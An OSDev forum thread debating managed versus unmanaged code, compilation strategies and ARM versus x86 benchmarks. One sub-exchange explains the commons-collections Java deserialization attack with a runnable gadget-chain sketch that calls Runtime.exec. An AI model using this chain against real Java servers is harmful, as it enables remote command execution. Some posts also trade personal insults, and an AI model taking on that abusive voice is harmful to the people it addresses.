So we're designing tools that deliberately hide/abstract lower level details; then saying that developers don't have enough experience when they don't know the lower level details that our tools have deliberately hidden; and then trying to pretend this "helps" the developer?

embryo2 wrote:
Brendan wrote:
I have 2 computers and both are 64-bit 80x86.

One has 2.8 GHz CPUs with 1300 MHz RAM and for this combination the ideal prefetch scheduling distance is 160 cycles. The other has 3.5 GHz CPUs with 1600 MHz RAM and for this combination the ideal prefetch scheduling distance is 200 cycles. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance?

One has 2 physical chips (and NUMA) with 4 cores per chip and hyperthreading (16 logical CPUs total) and 12 GiB of RAM (6 GiB per NUMA domain). The other has a single physical quad-core chip (8 logical CPUs total) and 32 GiB of RAM without NUMA. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance and the differences in memory subsystems, number of NUMA domains, chips, cores, etc?

One supports AVX2.0 and the other doesn't support AVX at all. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance, and the differences in memory subsystems (and number of NUMA domains, chips, cores, etc), and which SIMD extensions are/aren't supported?

Do you think it would be an unsolvable problem for you to decide how to ask a user about his hardware?


I tried to make it obvious how stupid this idea is, and you still weren't able to understand my point, so let me try again.

With just one Intel CPU (e.g. "Core i7 4770") there's maybe 4 different RAM speeds to worry about and maybe 8 different "total RAM" sizes. That adds up to 32 possible permutations for one specific Intel CPU alone. There are around 300 different Intel CPUs that support long mode. This gives 9600 permutations. For AMD and VIA there's probably about 100 more CPUs capable of long mode, so that takes us up to about 12800 permutations. However, some of these CPUs can be overclocked, so it's probably more like 14000 permutations. Also (especially for Xeons and Opterons) a computer might have one physical chip, or 2 or 4 or more physical chips (and various forms of NUMA and whatever else). This means it's probably much closer to 18000 permutations.

That's just 80x86 CPUs that support long mode. If you also include 32-bit 80x86 CPUs you can probably double that to 36000 permutations for "all 80x86 alone". Then there's ARM, SPARC, PowerPC, Itanium, MIPS, etc. For a rough estimate, you might be looking at a total of 50000 permutations.

If it takes 10 minutes to compile one variation and you've got a computer running 24 hours per day without stopping, it'd take almost an entire year (347 days) to compile all 50000 variations.

Now; what sort of insane retard is going to compile the same code 50000 times and provide all 50000 variations of the native binaries; and do that every single time they release a new version for one OS?

For a "byte code to native" compiler (that runs on the end user's computer and is a built in part of software installation) it'd be trivial for the compiler to auto-detect any details that effect optimisation (just like GCC's "-march=native" does) and create something optimised specifically for that specific computer. In this case, developers only need to provide one executable for all users.

embryo2 wrote:
Brendan wrote:
AOT may or may not be an important part of a managed environment; but this has nothing to do with using 2 AOT compilers (one before software is deployed and the other after/while software is installed by the end user) to solve portability and performance/optimisation and copyright problems in traditional unmanaged toolchains.

You introduce useless entities. It was shown how one AOT compiler can help; your second AOT compiler is useless.


You're a moron. A CPU can't execute portable byte-code; so unless there's a second AOT compiler, you end up with slow and bloated JIT pus destroying any hope of acceptable performance - performance so bad it doesn't even match the unacceptably poor performance we already get from traditional C/C++ compilers.

embryo2 wrote:
Brendan wrote:
embryo2 wrote:
The best solution is a managed environment with many options available, including JIT, AOT, hardware-protected sessions and, of course, the best ever smart compiler.


Can you back this up with logical reasoning?

Every option has advantages. If we can use an advantage, we can do our work better. So it's obvious that it's better to have the options that allow us to have advantages. And it's better to have a bag (the environment) for all these options, because it's very impractical to work with every option separately.


The only case where "managed environment" could be considered an advantage is if you're a hardware manufacturer relying on Wirth's law to ensure that consumers are always willing to pay more $ for faster/larger hardware.


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 11:50 am 

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
embryo2 wrote:
Schol-R-LEA wrote:
Wait a moment, are you claiming that the compiler (as opposed to the editor or IDE) should not only incorporate a spell checker for strings, but also be able to detect a spelling error in a string (e.g., "Qorld" instead of "World")?

There's an escaped quotation mark, which makes the string literal endless.

Maybe Brendan was kidding, giving us doubly-troubled code. Or maybe Brendan accidentally made this compiler-detectable bug

I overlooked that. I suspect that it was indeed an error, as it looks to me like Brendan dropped an 'n' between the escape and the double quote.

embryo2 wrote:
(despite his claims of being a very careful developer).

I don't believe you are serious here. Even if one were to assume that he'd apply the same degree of rigor to a casual forum post as he would to developing production code, 'careful developer' != 'never makes errors in code'. A careful developer is not one that is perfect; a careful developer is one who applies basic software engineering techniques such as external code reviews, unit and integration test suites, stringent compiler error and warning reporting, and code profiling to limit the chances of an error going undetected.

And before you say it, yes, that would include using a managed environment, if it provided any advantages that could not be gained in some other manner. Brendan's argument, which I feel is overstated but correct overall, is that many of the features of managed environments can be achieved in a more effective manner through different means, and that the claims regarding 'managed code' are mostly hype coming from certain software vendors rather than actual provable value.

embryo2 wrote:
Schol-R-LEA wrote:
To be fair, I suspect the Embryo simply chose the page as being the first one found in a Google search on the phrase 'CPU benchmark', without looking critically at what was actually presented or understanding the nuances of benchmarking

Yes. I had no intention of making a thorough examination of many Internet pages just because a tiny percentage of them might prove Brendan's point of view.

*facepalm* You were the one who brought up benchmarking (unless I missed something), so you should at least know what it is you are asserting before you assert it. This isn't a matter of who is right and who is wrong - understanding what benchmarks actually are, their limitations, the ways they can be exploited to misrepresent performance, and most of all how to interpret their results in a useful manner is something basic to performance testing. Any software developer should have some idea of the issues at hand when discussing them.

To be fair, benchmarking seems to be an unfamiliar area for you, so the initial error is understandable. Continuing to defend your lack of knowledge on the basis of an ad hominem argument, however, is simply stubbornness. If you don't have the time or inclination to find out more about the subject, fine, but don't snipe at Brendan while doing so.

embryo2 wrote:
I see what an ordinary user sees - there's no sane comparison between Intel and ARM processors.

This is precisely the sort of issue that I am talking about, where you are jumping into something on the basis of a general view without getting the details right. While I - and nearly everyone in the world - agree that the ARM architecture is vastly superior as a design to the x86 architecture (which is widely considered to be just about the worst around), the issues of instruction set, register file size, etc., are only one facet of performance. For historical reasons, x86 has been and continues to be widely used for desktop and server systems, and Intel has put a heroic amount of effort into squeezing as much performance out of that pile of crap as humanly possible. Even with its wide adoption for embedded and mobile use, ARM has not seen 1% of that development effort put into it until very recently, and in any case has a lot less room for improvement (which should have been a good thing, but...).

The practical upshot of this is that while ARM (along with other RISC designs such as MIPS, SPARC, or PowerPC, and even other big-CISC designs such as the old 68K series) is a far better design all around, and on the surface should be able to outperform x86 on every imaginable level, in practice x86 has been keeping pace with them and even outperforming them in places despite the fact that everyone, including Intel, wishes to see it dead and buried (Intel has tried to replace the x86 at least three times, the most notorious instance being the Itanic Disaster, but it's been too lucrative for them to pull the plug on it). The whole industry has had a deadpool running on the x86 for two decades, and so far no one has collected, and there's little reason to think any will in the next several years.

To get back to the main issue here, a large part of the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip. When Sun designed Java to be 'write once, run everywhere', they were primarily hoping to get people to run on SPARCs - the real purpose of their 'managed environment' was to divert users from relying on a specific hardware platform (though at the time they were thinking more in terms of AS/400s and VAXes than PCs), making it easier to switch to Sun's hardware platform. Similarly, one of the unstated purposes of .NET was to reduce the dependency of Windows on Intel hardware, because at the time it looked like x86 wasn't going to get extended any further and Microsoft wanted to be ready to jump to PowerPC or Itanium or what have you once x86 gave up the ghost. When the Itanic hit an iceberg, and AMD pulled a fast one on Intel with AMD64, all those plans got turned upside-down; but the fact remains that in the computer hardware world, the x86 is the friend no one likes.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 10:38 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
The payload relies on the fact that the object being unserialized can specify methods to invoke, due to a vulnerability in commons-collections. One of the methods it invokes is Runtime.exec("touch /tmp/pwned").

The payload doesn't rely on anything except the (de)serialization protocol. The protocol, of course, has nothing in common with the invocation of arbitrary methods. First of all, there should be a class, and the protocol defines what the class can expect and what it cannot. The class is found by name. No library is involved here, vulnerable or not. Next, if the JVM has successfully found the class, the protocol defines what method to invoke. This method can contain Java code, including Runtime.exec("touch /tmp/pwned"); but for the JVM to execute Runtime.exec("touch /tmp/pwned"), it should first find the actual class whose code contains such a line. If you think it's commons-collections where the JVM can find the Runtime.exec("touch /tmp/pwned"), then you can grep the library for "Runtime" and you'll find there's no code that uses the Runtime class.

And now, since I hope you see the need for the code to be available to the JVM, please tell me: where can the JVM get it from?
Octocontrabass wrote:
I'm sure the author can explain the vulnerability much better than I can.

Yes, he should be able to tell us how he managed to put a malicious class in the server's classpath.
Octocontrabass wrote:
embryo2 wrote:
But in fact the author mumbles a bit about "if it's not this way then it's impossible".

Can you specify exactly where the author states this?

It's the last sentence in the "vulnerability" section. Search for "it won't".

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 11:08 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Schol-R-LEA wrote:
embryo2 wrote:
(despite his claims of being a very careful developer).

I don't believe you are serious here. Even if one were to assume that he'd apply the same degree of rigor to a casual forum post as he would to developing production code, 'careful developer' != 'never makes errors in code'.

The bug issue is very important for the managed vs unmanaged discussion, and Brendan's claim was about an effectively almost bug-free solution using unmanaged. One part of that claim was his great personal care about a lot of things, including not trusting any hardware. So when Brendan tells us about the very safe unmanaged solution, which exists partly because of his personal care, I point to the problem with personal care. And I propose a solution which requires less personal care. Given the fact that everybody makes mistakes, I think the solution that is "more careless" for a programmer will prevail.
Schol-R-LEA wrote:
facepalm You were the one who brought up benchmarking (unless I missed something), so you should at least know what it is you are asserting before you assert it.

I assert there's no sane comparison between ARM and Intel. What's wrong with my assertion? Have you provided any proof that I am wrong? I have provided many links, including Brendan's preferred benchmarks, and I see no sane comparison.
Schol-R-LEA wrote:
To be fair, benchmarking seems to be an unfamiliar area for you, so the initial error is understandable. Continuing to defend your lack of knowledge on the basis of an ad hominem argument, however, is simply stubbornness. If you don't have the time or inclination to find out more about the subject, fine, but don't snipe at Brendan while doing so.

OK, so I can spend a few days and find nothing resembling a sane comparison. What should I do next?

The internal kitchen of benchmarking is unfamiliar to me simply because there are so many benchmarks. One stresses memory-intensive usage, another stresses computation-intensive usage, a third stresses something else. If I need to compare something, I usually look for readily available benchmarks where I can see the products I'm interested in compared side by side. Then I can read about the benchmark's details and, as a result, understand whether it is reliable or not. But here I just have no side-by-side comparison using the same methodology. So, what should I do? Should I write my own benchmark and buy ARM and Intel hardware to show they can be compared?
Schol-R-LEA wrote:
Intel has put a heroic amount of effort into squeezing as much performance out of that pile of crap as humanly possible.

In fact it's simpler. Intel just added a translation layer to its chips, and every freaky instruction now has a translated representation that is as efficient as anything ARM can do. But the translation also costs time, silicon and power. Also, Intel's internal processor optimization is weak: it works at the level of about 10 instructions, but it won't work for a larger instruction queue. So ARM has really interesting potential to win this game.
Schol-R-LEA wrote:
To get back to the main issue here, a large part of the goal of both Java and .NET was to make it easier to dislodge the industry from Intel's grip.

It's a disputable version. My view is that there's just a common understanding of the old principle: simpler is better. So simpler development pays off a lot for Java and .NET, and Intel here is almost irrelevant.
Schol-R-LEA wrote:
Microsoft wanted to be ready to jump to PowerPC or Itanium

Recompilation takes much less effort than the creation of a totally different (managed) environment.

_________________
My previous account (embryo) was accidentally deleted, so I had no choice but to create a new one. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 12:11 pm 
Offline
Member
Member

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5137
embryo2 wrote:
Next, if the JVM has successfully found the class, the protocol defines which method to invoke. That method can contain Java code, including Runtime.exec("touch /tmp/pwned"), but for the JVM to execute Runtime.exec("touch /tmp/pwned") it must first find the actual class whose code contains such a line.

The payload (ab)uses InvokerTransformer to specify an object that must be instantiated by calling the exec method of a Runtime object.
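There's no magic in that; this is essentially what InvokerTransformer.transform() does (a paraphrase of the commons-collections 3.x source, with its error handling omitted):

Code:
import java.lang.reflect.Method;

// Paraphrase of org.apache.commons.collections.functors.InvokerTransformer:
// the method name, parameter types, and arguments are ordinary serializable
// fields, restored straight from the payload.
class InvokerTransformerSketch {
    String iMethodName;
    Class[] iParamTypes;
    Object[] iArgs;

    public Object transform(Object input) throws Exception {
        Method method = input.getClass().getMethod(iMethodName, iParamTypes);
        return method.invoke(input, iArgs);
    }
}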

embryo2 wrote:
If you think commons-collections is where the JVM can find the Runtime.exec("touch /tmp/pwned"), then you can grep the library for "Runtime" and you'll find there's no code that uses the Runtime class.

Of course, the references to Runtime and exec are also contained in the payload.
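You can verify this yourself: serializing even a single InvokerTransformer embeds its method name and arguments in the byte stream (a minimal sketch, assuming commons-collections 3.x on the class path):

Code:
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import org.apache.commons.collections.functors.InvokerTransformer;

class PayloadStringsDemo {
    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(new InvokerTransformer(
                    "exec",
                    new Class[] { String.class },
                    new Object[] { "touch /tmp/pwned" }));
        }
        // The raw bytes now contain the strings "exec" and "touch /tmp/pwned",
        // which is why grepping the library source for "Runtime" finds nothing.
        System.out.println(new String(bos.toByteArray(), "ISO-8859-1").contains("exec"));
    }
}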

embryo2 wrote:
Yes, he should be able to tell us how he managed to put a malicious class on the server's class path.

He let the developer do it for him; after all, the malicious class is part of commons-collections. :roll:

If you aren't going to believe me, then ask the author yourself. He can explain it better than I could.

embryo2 wrote:
It's the last sentence in the "vulnerability" section. Search for "it won't".

Quote:
The take-away from this is that the “Objects” you see in the code above are the ones required for exploitation. If those aren’t available, this exploit wont work.

The "Objects" it refers to are these:

  • ChainedTransformer
  • ConstantTransformer
  • InvokerTransformer
  • LazyMap

Notice that those are all provided by commons-collections.
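Concretely, the payload builds something like this out of those classes (a sketch assuming commons-collections 3.x; note that running it really executes the command, and the published exploit additionally wraps the map so that deserialization itself performs the triggering lookup):

Code:
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

class GadgetChainSketch {
    public static void main(String[] args) {
        Transformer chain = new ChainedTransformer(new Transformer[] {
            new ConstantTransformer(Runtime.class),           // start from Runtime.class
            new InvokerTransformer("getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "getRuntime", new Class[0] }), // -> Method getRuntime
            new InvokerTransformer("invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[0] }),        // -> the Runtime instance
            new InvokerTransformer("exec",
                new Class[] { String.class },
                new Object[] { "touch /tmp/pwned" })          // -> run the command
        });
        Map lazy = LazyMap.decorate(new HashMap(), chain);
        lazy.get("any-missing-key"); // LazyMap runs chain.transform() on a miss
    }
}

Every object here is ordinary commons-collections code, driven purely by the field values carried in the serialized payload.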


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Thu Nov 12, 2015 1:06 pm 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1925
Location: Athens, GA, USA
embryo2 wrote:
The bug issue is very important for the managed vs unmanaged discussion: Brendan's claim was about an effective, almost bug-free solution using unmanaged code. And one part of the claim was his great personal care for a lot of things, including not trusting any hardware. So, when Brendan tells us about the very safe unmanaged solution, which is also due to his personal care, I point to the problem with personal care. And I propose a solution which requires less personal care. Given the fact that everybody makes mistakes, I think the solution that lets a programmer be 'more careless' will prevail.

And here I can see that you have missed Brendan's point entirely. Brendan is not arguing against managed environments per se (well, he is, but that's actually a side issue to his actual point), but rather that one shouldn't commit to a design feature without knowing ahead of time that it provides a measurable advantage. What he has said time and again is not 'this is wrong and always will be wrong', but rather, 'where is the advantage in it?' All you need to do is go through the numbers and demonstrate that there are advantages to a managed system that cannot be achieved through an unmanaged system - something he would argue you should have already done anyway before committing to this course of action.

Furthermore, both of you seem to have missed (or are ignoring) my main point, which is that you are arguing at cross purposes, and that the reason that is happening is that you haven't agreed on your terminology. I would add that as far as I can tell, no one in this debate - not you, not Brendan, not Sun/Oracle, not Microsoft, not any of those on this hype train for or against - has taken the time to pin down what the terms 'managed code' and 'managed environment' ACTUALLY MEAN, in a way that is both consistent and which everyone (more or less) can agree upon, meaning that literally none of you know what you are talking about. Define your damn terms!

If you can't, then guess what? That tells me that the terms don't mean anything. Prove to me that they are something more than marketing, and then we can talk. Better still, both of you write down on different web pages (or wiki entries or Gists or what have you) what YOU think the terms mean, and what terms are relevant to the conversation, without looking at what the other one wrote for at least 24 hours, then let's see if you two are actually talking about anything like the same things.

embryo2 wrote:
Schol-R-LEA wrote:
facepalm You were the one who brought up benchmarking (unless I missed something), so you should at least know what it is you are asserting before you assert it.

I assert there's no sane comparison between ARM and Intel.

I agree, and would go so far as to say no such comparison can be made, for a number of reasons, starting with - once again - the lack of any clear idea of what a 'sane comparison' would look like.

There are plenty of reasons why an apples-to-oranges comparison of some aspects of the two designs cannot be made, no question. That's pretty much true of any two unrelated processor architectures. However, since we don't know just what it is you intend to compare, we can't even say whether it is possible or not.

embryo2 wrote:
Have you provided any proof I am wrong?

You do understand that it is the person making a claim who holds the burden of proof, don't you? That's one of the cornerstones of both the scientific method and general engineering.

embryo2 wrote:
Schol-R-LEA wrote:
To be fair, benchmarking seems to be an unfamiliar area for you, so the initial error is understandable. Continuing to defend your lack of knowledge on the basis of an ad hominem argument, however, is simply stubbornness. If you don't have the time or inclination to find out more about the subject, fine, but don't snipe at Brendan while doing so.

OK, so I can spend a few days and find nothing resembling a sane comparison. What should I do next?

Once again, you have missed my point - you need to understand what a benchmark is, and what the limitations of benchmarks in general are, in order to interpret them meaningfully. From what you have said, you don't seem to know these things, but are still trying to use benchmarks to support your case (or at least asking for benchmarks that would be relevant to it). You need to perform due diligence before you can even argue that issue effectively.

embryo2 wrote:
Schol-R-LEA wrote:
Intel has put a heroic amount of effort into squeezing as much performance out of that pile of crap as humanly possible.

In fact it's simpler. Intel just added a translation layer to its chips, and every freaky instruction now has a translated representation that is as efficient as anything ARM can do. But the translation also costs time, silicon and power. Also, Intel's internal processor optimization is weak: it works at the level of about 10 instructions, but it won't work for a larger instruction queue. So ARM has really interesting potential to win this game.

First, AFAIK, that has always been true of the x86 processors since the 8086 - they have all used a layer of microcode and/or a translation engine over a simpler (inaccessible but definitely present) load/store hardware implementation.

Second, as I have already said, I agree - everybody agrees - that the x86 is a shitty design and that ARM (or any of several other designs) would be a better choice. The problem isn't the hardware, it's the software, and the effort it would take to either port the code or develop a software emulator that would perform adequately while supporting a sufficient portion of the existing code base, or some combination of the two. Apple managed to pull it off during the transition from 68K to PowerPC, and again from PowerPC to x86, but it was rocky, and they only managed it because they had a tight rein on both the hardware and software platforms from the very beginning (and far fewer misbehaving or quirky programs to deal with).

It is something like a Mexican standoff: for better or worse, Microsoft has been delaying the reckoning they know is coming on this matter, and until they act, the larger PC manufacturers will keep focusing their efforts on cheap PCs regardless of the long-term fallout because that's what their competitors are doing, and the software developers will keep doing things that misuse both the hardware and the OS in non-portable ways because they need an edge over their competitors. Until one of them changes what they are doing, the other two have to keep at it, too, or risk losing everything.

embryo2 wrote:
Schol-R-LEA wrote:
To get back to the main issue here, a large part of the goal of both Java and .NET was to make it easier to dislodge the industry from Intel's grip.

It's a disputable version. My view is that there's just a common understanding of the old principle: simpler is better. So simpler development pays off a lot for Java and .NET, and Intel here is almost irrelevant.

What I said wasn't opinion; it's a matter of historical record. While they never admitted those goals officially, several developers from both MS and Sun have come forward to say that reducing hardware vendor lock-in was among the (many) design goals of both systems.

embryo2 wrote:
Schol-R-LEA wrote:
Microsoft wanted to be ready to jump to PowerPC or Itanium

Recompilation takes much less effort than the creation of a totally different (managed) environment.

What.

/me stares in shock at what Embryo just wrote

You're an OS developer. You should know that, managed or otherwise, a lot more goes into porting an OS - even one designed for portability - to a new hardware platform than just recompiling. A lot more.

Windows wasn't designed with portability in mind, especially after Microsoft killed the support for Alpha- and SPARC-based servers. If Microsoft put everything else on hold and shifted their entire development staff to porting Windows 10 and all their utilities, development tools, applications, etc., to ARM (or any other platform), it would still take them two or three years of work - and they would have to get every single hardware and software vendor on board with them before they committed to doing it, or it would be the Itanic all over again. While they know that the x86-64 hardware will eventually need to be replaced, they cannot afford to make that jump until the last possible moment. I wish it were otherwise, and so do they, but that's the reality of it.

Yes, shifting to a managed environment would take a comparable effort, I agree, but the advantage of doing so is that it can be done piecemeal, in stages, without having to take an irreversible leap into the unknown. By moving a large part of their development work and that of their clients to .NET, they were trying to amortize the costs of that shift over a period of several years, as well as reduce the risks - if something catastrophic happened to block the hand-over, they would still have the old platform to fall back on for a while, and the effort wouldn't be wasted when they re-targeted to some other new platform. But - and this is the point Brendan is making - they knew from the start that there would be a price to pay for it, and they have fought tooth and nail to get their clients to pay that price.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Fri Nov 13, 2015 7:35 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
embryo2 wrote:
Next, if the JVM has successfully found the class, the protocol defines which method to invoke. That method can contain Java code, including Runtime.exec("touch /tmp/pwned"), but for the JVM to execute Runtime.exec("touch /tmp/pwned") it must first find the actual class whose code contains such a line.

The payload (ab)uses InvokerTransformer to specify an object that must be instantiated by calling the exec method of a Runtime object.

Can you specify the way it is used? I see only some magic there, but no sane algorithm. In my case the algorithm is simple: the JVM loads a class whose name it gets from the payload. But your algorithm can work only if some magic is present. Specifically, how exactly does the payload (ab)use the InvokerTransformer to specify an object that must be instantiated? Your version, "by calling the exec method of a Runtime object", was disproved by grepping the commons-collections source code for "Runtime".
Octocontrabass wrote:
Of course, the references to Runtime and exec are also contained in the payload.

OK, the payload can contain any text, but what next? How can arbitrary text be transformed into very specific actions? Please tell me; I still see only some magic here and nothing more.
Octocontrabass wrote:
embryo2 wrote:
Yes, he should be able to tell us how he managed to put a malicious class on the server's class path.

He let the developer do it for him; after all, the malicious class is part of commons-collections. :roll:

If you are so sure about it, then why am I still not seeing your algorithm for this magic? How does it work? Where are the Martians who convert payload strings into code?
Octocontrabass wrote:
If you aren't going to believe me, then ask the author yourself. He can explain it better than I could.

His explanation will be: I just put the malicious class on the server's class path.
Octocontrabass wrote:
embryo2 wrote:
It's the last sentence in the "vulnerability" section. Search for "it won't".

Quote:
The take-away from this is that the “Objects” you see in the code above are the ones required for exploitation. If those aren’t available, this exploit wont work.

The "Objects" it refers to are these:

  • ChainedTransformer
  • ConstantTransformer
  • InvokerTransformer
  • LazyMap

Notice that those are all provided by commons-collections.

Have you noticed the enclosing object?

_________________
My previous account (embryo) was accidentally deleted, so I had no choice but to create a new one. But maybe it was a good lesson about software reliability :)

